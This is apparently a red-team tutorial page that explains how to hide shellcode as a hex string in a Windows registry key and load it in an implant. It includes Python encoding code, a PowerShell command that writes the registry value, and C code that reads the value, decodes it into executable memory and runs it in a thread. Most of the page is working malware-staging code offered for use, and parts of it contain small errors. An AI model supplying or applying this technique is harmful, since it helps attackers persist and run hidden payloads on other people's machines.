Registry Keys
We will store our shellcode as a ASCII string in registry and in our implant, we will read the registry key, convert that string back into hex, and execute that.
To convert your shellcode into an ASCII string, we can use this snippet of code:
try:
with open(sys.argv[1]) as shellcode:
bytes = bytearray(shellcode.read())
shellcode.close()
except IOError:
print("Error reading file")
print("".join("{:02X}".format(c) for c in bytes))
You will get an ASCII string in the output, we can put this in registry key so
New-ItemProperty -Path "HKCU:\SOFTWARE\regkey" -Name "Name" -Value "ASCIISTRING" -PropertyType String -Force
In our C Code, we can extract the shellcode from registry like so.
DWORD dwRegistryEntryOneLen;
DWORD dwAllocationSize = shellcodesize;
LPCSTR lpData = (LPCSTR)VirtualAlloc(NULL, dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
DWORD dwType = REG_SZ;
HKEY hKey = 0;
LPCSTR subkey = "HKCU:\SOFTWARE\regkey";
RegOpenKeyA(HKEY_CURRENT_USER,subkey,&hKey);
RegQueryValueExA(hKey, "Name", NULL, &dwType, (LPBYTE)lpData, &dwAllocationSize);
LPCSTR decodedShellcode = (LPCSTR)VirtualAlloc(NULL,dwAllocationSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
LPCSTR tempPointer = decodedShellcode;
for (int i = 0; i < dwAllocationSize/2; i ++) {
sscanf_s(lpData+(i*2), "%2hhx", &decodedShellcode[i]);
}
Shellcode will be stored in decodedShellcode variable.
We can then create a thread executing our shellcode or do whatever is applicable to your situation.
Last modified 1yr ago
Copy link